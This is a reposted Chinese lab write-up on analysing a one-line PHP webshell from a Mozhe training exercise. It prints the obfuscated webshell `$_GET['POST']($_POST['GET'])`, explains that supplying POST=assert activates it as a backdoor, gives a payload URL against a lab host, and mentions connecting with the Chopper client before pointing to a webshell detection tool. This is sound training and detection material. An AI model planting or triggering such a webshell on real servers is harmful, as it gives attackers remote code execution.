首页 > Web开发 > 详细

WebShell代码分析溯源(一)

时间:2019-10-29 14:46:08      阅读:69      评论:0      收藏:0      [点我收藏+]

WebShell代码分析溯源(一)

一、一句话变形马样本

<?php $_GET[‘POST‘]($_POST[‘GET‘]);?>

 

二、代码分析

1、调整代码格式

<?php

$_GET[‘POST‘]($_POST[‘GET‘]);

?>

2、分析代码,首先以GET方法接收url中POST参数传递的值,然后又以POST方法接收GET参数传递的值,因此可以构造payload:http://www.test.com/test.php?POST=assert,这样就相当于一句话木马变成这样: <?php assert($_POST[‘GET‘]);?>

注:不能使用eval,eval与assert的区别:

eval函数中参数是字符,eval并不支持可变变量形式

assert函数中参数为表达式 (或者为函数)

参考:

https://www.anquanke.com/post/id/173201/

https://blog.csdn.net/whatday/article/details/59168605

三、漏洞环境搭建

1、这里使用在线学习平台墨者学院中的实验环境(WebShell代码分析溯源(第1题)),地址: https://www.mozhe.cn/bug/detail/TkhnOVovVm14KzV6aTN5K2d1dFZ0Zz09bW96aGUmozhe

2、代码环境,下载代码

  技术分享图片

3、找到webshell代码处,然后分析(上面已经分析过了)

  技术分享图片

4、构造payload,然后使用菜刀连接

Payload: http://219.153.49.228:49785/www/cn-right.php?POST=assert

  技术分享图片

四、后记

学习常用webshell扫描检测查杀工具---WebShellKillerTool (深信服webshell扫描检测引擎),网址: http://edr.sangfor.com.cn/tool/WebShellKillerTool.zip

使用深信服WebShellKillerTool进行webshell查杀

  技术分享图片

 

WebShell代码分析溯源(一)

原文:https://www.cnblogs.com/yuzly/p/11743718.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!